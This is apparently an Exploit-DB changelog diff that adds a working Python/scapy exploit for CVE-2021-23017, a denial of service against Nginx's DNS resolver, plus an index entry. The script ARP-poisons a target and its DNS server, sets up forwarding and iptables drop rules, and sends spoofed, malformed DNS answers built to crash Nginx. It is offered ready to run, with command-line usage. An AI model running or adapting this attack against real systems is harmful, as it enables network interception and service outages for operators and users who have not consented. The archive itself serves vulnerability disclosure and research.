DB: 2022-07-12

1 changes to exploits/shellcodes

Nginx 1.20.0 - Denial of Service (DOS)

Author: Offensive Security

exploits/multiple/remote/50973.py

@@ -0,0 +1,114 @@
+# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
+# Date: 2022-6-29
+# Exploit Author: Mohammed Alshehri - https://Github.com/M507
+# Vendor Homepage: https://nginx.org/
+# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
+# Version: 0.6.18 - 1.20.0
+# Tested on: Ubuntu 18.04.4 LTS bionic
+# CVE: CVE-2021-23017
+# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
+# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
+# The service needs to be configured to use Nginx resolver
+
+from scapy.all import *
+from multiprocessing import Process
+from binascii import hexlify, unhexlify
+import argparse, time, os
+
+def device_setup():
+    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
+    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
+
+def ARPP(target, dns_server):
+    print("[*] Sending poisoned ARP packets")
+    target_mac = getmacbyip(target)
+    dns_server_mac = getmacbyip(dns_server)
+    while True:
+        time.sleep(2)
+        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
+        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
+
+def exploit(target):
+    print("[*] Listening ")
+    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
+
+"""
+RFC schema
+ 0                   1                   2                   3
+ 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|             LENGTH            |               ID              |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|            ANCOUNT            |            NSCOUNT            |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|            ARCOUNT            |               QD              |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|               AN              |               NS              |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+|               AR              |
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+Fig. DNS
+
+"""
+def process_received_packet(received_packet):
+    if received_packet[IP].src == target_ip:
+        if received_packet.haslayer(DNS):
+            if DNSQR in received_packet:
+                print("[*] the received packet: " + str(bytes_hex(received_packet)))
+                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
+                try:
+                    # \/    the received DNS request
+                    dns_request = received_packet[DNS].build()
+                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
+                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
+                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
+                    payload = [
+                        dns_request[0:2],
+                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
+                        dns_request[12:null_pointer_index+1],
+                        dns_request[null_pointer_index+1:null_pointer_index+3],
+                        dns_request[null_pointer_index+3:null_pointer_index+5],
+                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
+                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
+                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
+                    ]
+
+                    payload = b"".join(payload)
+                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
+                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
+                        payload)
+                    print("[+] dns answer: "+str(hexlify(payload)))
+                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
+
+                    sendp(spoofed_pkt, count=1)
+                    print("\n[+] malicious answer was sent")
+                    print("[+] exploited\n")
+                except:
+                    print("\n[-] ERROR")
+
+def main():
+    global target_ip
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-t", "--target", help="IP address of the target")
+    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
+    args = parser.parse_args()
+    target_ip = args.target
+    dns_server_ip = args.dns_server
+    device_setup()
+    processes_list = []
+    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
+    exploitProcess = Process(target=exploit,args=(target_ip,))
+    processes_list.append(ARPPProcess)
+    processes_list.append(exploitProcess)
+    for process in processes_list:
+        process.start()
+    for process in processes_list:
+        process.join()
+
+if __name__ == '__main__':
+    target_ip = ""
+    main()

files_exploits.csv

@@ -18711,6 +18711,7 @@ id,file,description,date,author,type,platform,port
 50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware,
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows,
+50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,